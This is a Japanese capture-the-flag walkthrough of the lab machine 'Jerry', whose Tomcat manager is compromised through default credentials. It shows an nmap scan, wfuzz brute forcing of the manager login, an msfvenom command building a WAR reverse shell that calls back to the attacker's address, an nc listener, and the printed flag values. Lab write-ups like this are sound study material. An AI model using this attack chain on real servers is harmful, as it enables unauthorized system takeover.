はじめに

• マシン名：Jerry
• OS：Windows
• 目標：user.txtとroot.txtの中身の取得
• ターゲットIPアドレス：10.10.10.95

ポートスキャン

# nmap -A 10.10.10.95

8080（http）が開いてる。

ブラウザで8080番ポートへアクセス

ブラウザで8080番ポートへアクセスすると、tomcatの管理画面。

ディレクトリスキャン

いつもはgobusterを使うが、色々なツールを使いこなすためにwfuzzを使ってでディレクトリスキャンを実行してみる。

# wfuzz -z file,/usr/share/dirb/wordlists/common.txt -c --hc 404 -t 100 http://10.10.10.95:8080/FUZZ

気になるものはなし。

管理画面への認証試行

ディレクトリスキャンで次につながるものを見つけられなかったので、tomcat管理画面への認証試行を行う。
「tomcat default credentioal」とかで調べて見つけた以下のサイトでユーザーリスト、パスワードリストを作成し、wfuzzで認証試行。
Default-Credentials/Apache-Tomcat-Default-Passwords.mdown at master · netbiosX/Default-Credentials · GitHub

# wfuzz -z list,admin-manager-role1-root-tomcat -z list,password-Password1-password1-admin-tomcat-manager-role1-changethis-r00t-s3cret --basic FUZZ:FUZ2Z -c --hc 401 http://10.10.10.95:8080/manager/html

tomcat - s3cretという組み合わせでログイン成功。

リバースシェルのアップロード

ログインすると、以下のような画面。warファイルをアップロードができそうなので、ここにmsfvenomでwarのリバースシェルをアップロードする。

リバーシェル獲得のためのwarファイルの生成は、msfvenomのチートシートを参考にした。
MSFVenom Cheatsheet « Red Team Tutorials

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.23 LPORT=1111 -f war > shell.war

アップロード成功。

シェルの獲得

ncを使って1111ポートで待ち受ける。

# nc -lvp 1111

ブラウザで、アップロードしたパスへアクセスすると、シェルが返ってきた。しかもシステム権限で。

あとは、user.txtとroot.txtを確認して終了。

user.txt：7004dbcef0f854e0fb401875f26ebd00
root.txt：04a8b36e1545a455393d067e772fe90e

追記

認証失敗時のエラー画面に、tomcat - s3cretと書かれてました。ちゃんと確認すればwfuzzで認証試行する必要なかったようだ。